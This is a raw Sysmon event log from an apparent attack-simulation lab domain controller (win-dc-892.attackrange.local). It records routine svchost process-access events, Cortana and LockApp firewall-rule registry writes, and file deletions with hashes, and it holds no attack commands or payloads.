ws\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.896{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000005309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{2D8803FC-C6C4-4857-9138-008066C3ACC8}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ|Edge=TRUE| 23542300x80000000000000005308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.896{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{40D70A60-B2F6-48CE-99F6-2D7C7698A637}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{9E0400DC-C1BF-4209-BAC8-7A2918DF75BC}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{FB408827-D992-4BA6-940A-1209566C25F7}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5ED8A927-145B-48A7-86A2-904C6E5C9422}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000005303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E7276D86-555A-436C-B0B0-D6B64C301E0B}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000005302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{7AD2DFB0-1DED-4662-9E03-6E49984C370D}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{578DD007-6A23-46F0-B435-F60E7416EC9D}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{32760101-92F2-4769-BCC6-90C0C9C9813A}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 
13241300x80000000000000005299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{1A8173B4-C4E5-41E6-950A-C50EE8630427}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 11241100x80000000000000005298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.881{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.881 23542300x80000000000000005297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG2MD5=F045C633B9340D27547D12EECC7EE0B9,SHA256=9D04CBA5F699DF1AD06BC5541F85917A856292F181493393EC89EBF2980A1B3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG1MD5=CD0B1FDF28910E391492F4807B474473,SHA256=EF923067C3091E773EB086A786D5E2FCA53B01EE8CE0A2EEB6704C85935CD2F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.datMD5=9C746CF42DB3B621537D8310CE3D4BE1,SHA256=52D93909D30105CE61FB14BD32AC9473BC627199AA83808B337F6D874CC46FDC,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|M=microsoft.lockapp_cw5n1h2txyewy|Name=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\|PFN=Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy| 23542300x80000000000000005293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
